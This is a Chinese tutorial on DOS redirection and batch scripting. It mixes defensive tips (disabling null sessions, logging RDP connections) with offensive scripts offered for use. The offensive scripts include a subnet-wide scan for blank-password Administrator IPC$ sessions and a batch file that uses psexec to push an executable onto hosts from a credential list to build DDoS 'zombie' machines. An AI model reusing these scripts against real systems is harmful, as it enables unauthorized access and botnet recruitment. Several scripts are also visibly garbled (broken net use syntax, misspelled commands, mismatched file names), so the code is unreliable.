二、DOS的重定向命令使用方法及其在安全方面的应用
DOS下有一个特殊的命令——重定向命令,非常有用,巧妙灵活运用可以给我们带来很大的方便——无论是入侵还是防守,抑或是系统应用,都可以巧妙利用,下面是几个重定向命令在安全方面的应用实例
▲1、命令格式
 
DOS的标准输入输出通常是在标准设备键盘和显示器上进行的,利用重定向,可以方便地将输入输出改向磁盘文件或其它设备。其中:
 
(1)、大于号“>”将命令发送到文件或设备,例如打印机>prn。使用大于号“>”时,有些命令输出(例如错误消息)不能重定向。
 
(2)、双大于号“>>”将命令输出添加到文件结尾而不删除文件中已有的信息。
 
(3)、小于号“<”从文件而不是键盘上获取命令所需的输入。
 
(4)、>&符号将输出从一个默认I/O流(stdout,stdin,stderr)重新定向到另一个默认I/O流。
 
例如,command >output_file 2>&1将处理command过程中的所有错误信息从屏幕重定向到标准文件输出中。标准输出的数值如下所示:
 
标准输出 等价的数值
 
Stdin 0
Stdout 1
Stderr 2
 
其中,(1)和(2)都创建一个文件用于存放数据(4)可能不能够在DOS下使用。
 
▲2、重定向命令的输出
 
几乎所有的命令均将输出发送到屏幕。即使是将输出发送到驱动器或打印机的命令,也会在屏幕上显示消息和提示。要将输出从屏幕重定向到文件或打印机,请使 用大于号(>)。大多数命令中均可以使用大于号。例如,在以下命令中,dir命令生成的目录列表重定向到Dirlist.txt文件: dir>dirlist.txt,如果Dirlist.txt文件不存在,系统将创建该文件。如果Dirlist.txt存在,系统将使用dir命 令的输出替换文件中的信息。
 
要将命令输出添加到文件结尾而不丢失文件中的任何信息,请使用双大于号(>>)。例如, 在以下命令中,dir命令生成的目录列表附加到Dirlist.txt文件中:dir>dirlist.txt,将输入重定向到一个命令,就象可以 将命令输出发送到文件或打印机而不是屏幕一样,您可以从文件而不是从键盘获取命令的输入。要从文件获取输入,请使用小于号(<)。例如,以下命令将 从List.txt文件中获取sort命令的输入:sort
 
▲3、应用举例
 
①给注册表加锁/解锁
 
大家知道,注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\ Policies\System分支下的DWORD值“Disableregistrytools”的键值如为“1”,则可以给注册表加锁,这样别人就无 法使用注册表编辑器。利用重定向命令在DOS下就可以给注册表加锁/解锁,非常方便。
 
打开记事本程序,新建一个文本文件,输入如下内容:
 
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
另存为以.bat为扩展名的批处理文件,点击这个文件注册表就会被锁定!
 
在上面的命令中,echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,如果想看到程序执行过程, 请将“@”去掉。大家在编写上述代码时要注意的是,第一行中的“REGEDIT4”一定要用大写字母,在第二行中“echo”和“.”之间没有空格。 “>>”产生的内容将追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以无需确认就删除123.reg文件。
 
要想给注册表解锁,可以编辑这个批处理文件,只需将 "DisableRegistryTools"=dword:00000001改为"DisableRegistryTools"=dword: 00000000,其他内容不变,保存为.bat文件,点击就可以给注册表解锁了。
 
②把登陆3389的机器IP记录下来
 
把下面的内容保存为3389IP.bat: 
time /t >>log.log
netstat -n -p tcp |find ":3389">>Log.log
start Explorer
运行3389IP.bat,然后查看log.log文件即可看到登陆3389的机器IP,是不是很方便呢?
 
③恢复DOS实模式
 
大家知道,某些恶意网页会修改浏览者的注册表,在无所不用其极的各种手段中,修改注册表使DOS实模式不可用是其中的招数之一。要想恢复DOS实模式方法有很多,用批处理和重定向命令结合使用,是比较特别的一招,在此与大家分享。
 
echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg
另存为以.bat为扩展名的批处理文件,点击这个文件就可以恢复DOS实模式,那些DOS应用程序又可以使用了。
 
④等待肉鸡上门
 
每天费时费力的找肉鸡是不是很辛苦,利用重定向命令和批处理文件就可以让你简单的找到肉鸡!方法是用记事本新建一个文本文件,输入如下内容:
 
@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start
保存为.bat文件(事先得准备好一个nc.exe文件,它是网络故障事件检测软件Netcat的主程序),然后运行此程序之后,你就等着肉鸡上门主动来找你吧!运气好的话,每天10个不成问题。
 
⑤快速进行空连接
 
空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令net use \\IP\ipc""/user:""就可以简单地和目标建立一个空连接(需要目标开放IPC)。利用重定向命令和for命令就可以对一个C类网段进行快速的空连接,并把结果保存到一个文件 中供你分析。方法是用记事本编辑如下内容的文件:
 
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc""/use:"Administrator"|find"命令完成">>test.txt
批处理文件保存为.bat,运行即可。这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc连接,如果成功就把结果记录在test.txt。这样就实现了NT弱口令扫描功能!其中,for命令的功能是对一组文件中的每一个文件执行 某个特定命令,也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO command [command-parameters],具体的含义:
 
%variable:指定一个单一字母可替换的参数。
 
(set):指定一个或一组文件。可以使用通配符。
 
command:指定对每个文件执行的命令。
 
command-parameters:为特定命令指定参数或命令行开关。
 
在批处理文件中使用FOR命令时,指定变量请使用%%variable而不要用%variable。变量名称是区分大小写的,所以%i不同%I。
 
⑥禁止空连接
 
空连接的存在对有一定的危险,所以我们还是禁止它为好!方法是输入net share察看本地共享资源,接下来输入如下命令删除共享:
 
net share ipc/deletenetshareadmin /delete
 net share c/deletenetshared /delete(如果有e,f等盘符可以同法删除)
 
然后用记事本新建一个文本文件,输入如下内容即可:
 
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]>>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
另存为以.bat为扩展名的批处理文件,点击这个文件就可以禁止空连接。
 
⑦扫描所有和本机以TCP协议连接的计算机
 
扫描自己的计算机端口,发现有特殊端口打开,可以查木马,不仅如此,利用下面这个批处理文件还可以把所有和本机以TCP协议连接的计算机IP地址都记录下来。这个.bat文件内容如下:
 
data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log
这样不仅可以记录下对方的IP,还有时间和日期,方便自己查看。
 
⑧自动获取DDoS肉鸡
 
DDoS是Distributed Denial of Service的缩写,意即分布式拒绝服务攻击。它是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从 而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯, 代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理 程序的运行。
 
虽然不建议大家使用DDoS方式攻击,但作为技术掌握还是很有必要的。可是,如何才能获取进行DDoS攻击的肉鸡呢?把下面的内容保存为ok.bat文件就可以达到目的了:
 
@echo off
echo自动获取DDoS肉鸡
for /f "tokens=1,3*" %i in (host.txt) do net use \\%k\ipc/user:"\sysytem32
if errorelevel 0 goto success
psexec -d \\%i c:\winnt\system32\%1
net user \\%i\ipc$ /del
:success
echo >>success.txt
echo 肉鸡:%i>>success.txt
echo 用户名:%j>>success.txt
echo 密码:%k>>success.txt
echo >>success.txt
使用方法是ok.bat *.exe host.txt,其中host.txt的格式为:ip administrator password。好了,快试试吧。但不要用来干破坏。
 
其实,本文所说的方法主要是利用了批处理和相关的命令,重定向命令在其中只是个纽带,起连接作用,但也是不可忽视的,运用得好,能够大大提高工作效率和方便性。